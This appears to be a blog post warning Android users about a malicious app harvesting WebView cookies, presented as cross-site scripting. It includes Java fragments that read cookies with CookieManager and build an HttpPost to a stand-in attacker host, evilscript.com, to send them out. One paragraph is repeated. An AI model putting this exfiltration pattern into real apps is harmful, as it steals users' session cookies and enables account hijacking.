Many of the Android applications display web content and also interact with it. This is possible by exposing a web browser as a standalone component and embedding it in the application. Such a component is called as WebView. WebView uses a number of APIs which can interact with the web contents inside WebView. In the current blog-post, Cross-site scripting attacks or XSS attacks specific to Android WebView are discussed.

What is Cross-site Scripting?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web Applications. To protect the user’s environment from malicious code, browsers use a sand-boxing mechanism that limits a script to access only resources associated with its origin site. Unfortunately, these security mechanisms fail if a user unknowingly executes a malicious script from an intermediate, trusted site. In this case, the malicious script is granted full access to all resources (e.g. Authentication tokens and cookies) that belong to the trusted site. Such attacks are called cross-site scripting (XSS) attacks.

How are Cross-site scripting attacks possible in Android?

By finding ways of executing malicious scripts through the third party malicious app on phone, an attacker can gain elevated access-privileges to sensitive page content, session cookies, and a variety of other information in the phone such as contacts.

Cross site Scripting by stealing cookies from user’s device

The most common behavior of XSS attacks is to gather cookies. Cookies are small text files that reside on a user’s computer and store name-value pairs along with some metadata. Cookies are commonly used to store information intended to be persistent during a browser session or from session to session, such as session IDs, user preferences, or login information.

When the user runs the application through the WebView, Android applications can monitor the events occurred within WebView. Cookies can be gathered at every page navigation of the user using the method getCookie() from CookieManager class as shown in the code fragment below:

CookieManager cookieManager = CookieManager.getInstance(); final string cookie = cookieManager.getCookie(url);

Through HttpPost, malicious script can be run on the user’s Android device, cookies and URL can be sent to any third party (i.e., the attacker’s server), thus avoiding the same-origin policy or cookie protection mechanism.

HttpClient httpClient = new DefaultHttpClient(); HttpPost httpPost = new HttpPost(“http://evilscript.com/androidCookie.php”);

The attacker is now able get all the cookies and will be able to launch several attacks such a Session Hijacking and impersonating user using stolen cookies. The attacks described above are quite dangerous as the user sees only the trusted content and is not aware that his cookies are being stolen. The attack is shown in the figure.





The attacker is now able get all the cookies and will be able to launch several attacks such a Session Hijacking and impersonating user using stolen cookies. The attacks described above are quite dangerous as the user sees only the trusted content and is not aware that his cookies are being stolen.

Through the blog-post, I would like to notify the Android users about the malicious applications, and protect their Android phones from such attacks.